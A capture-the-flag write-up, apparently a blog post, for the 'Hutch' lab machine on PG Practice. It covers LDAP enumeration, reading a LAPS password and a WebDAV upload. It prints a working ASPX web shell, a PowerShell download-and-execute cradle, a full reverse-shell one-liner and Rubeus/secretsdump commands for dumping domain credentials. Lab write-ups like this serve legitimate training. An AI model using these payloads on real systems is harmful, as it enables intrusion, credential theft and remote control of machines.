Post

LDAP, WebDAV, LAPS & Unintended Solutions - Hutch @ PG Practice

We are solving Hutch from PG-Practice. For user, we will get credentials from LDAP & use them to upload a web shell via Webdav. For root, we will read a LAPS password for the intended way & then explore other methods.

Notes

LDAP

1
2
3
4
5
// list all attributes
ldapsearch -x -b "dc=hutch,dc=offsec" "*" -h hutch.pg

// query LAPS password
ldapsearch -D fmcsorley@HUTCH.OFFSEC -w CrabSharkJellyfish192 -o ldif-wrap=no -b 'dc=hutch,dc=offsec' -h hutch.pg "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd

ASPX Runner

1
iex(iwr http://ip/run.txt -usebasicparsing)
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">

void Page_Load(object sender, EventArgs e){
 ProcessStartInfo si = new ProcessStartInfo();
 si.FileName = "powershell.exe";
 si.Arguments = "-enc ...";
 Process p = Process.Start(si);
 p.WaitForExit();
}
</script>

Run.txt

1
$client = New-Object System.Net.Sockets.TCPClient("ip",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ">_ ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Rubeus TGTDeleg

1
2
3
4
5
6
7
iwr http://ip/Rubeus.exe -outfile Rubeus.exe
.\Rubeus.exe tgtdeleg /nowrap
// copy ticket over & base64 decode, then:
python3 /opt/impacket/examples/ticketConverter.py m.kirbi m.ccache
export KRB5CCNAME=`pwd`/m.ccache
sudo ntpdate -u hutch.pg
python3 /opt/impacket/examples/secretsdump.py HUTCH.OFFSEC/HUTCHDC\$@hutchdc.hutch.offsec -dc-ip hutch.offsec -no-pass -k
This post is licensed under CC BY 4.0 by the author.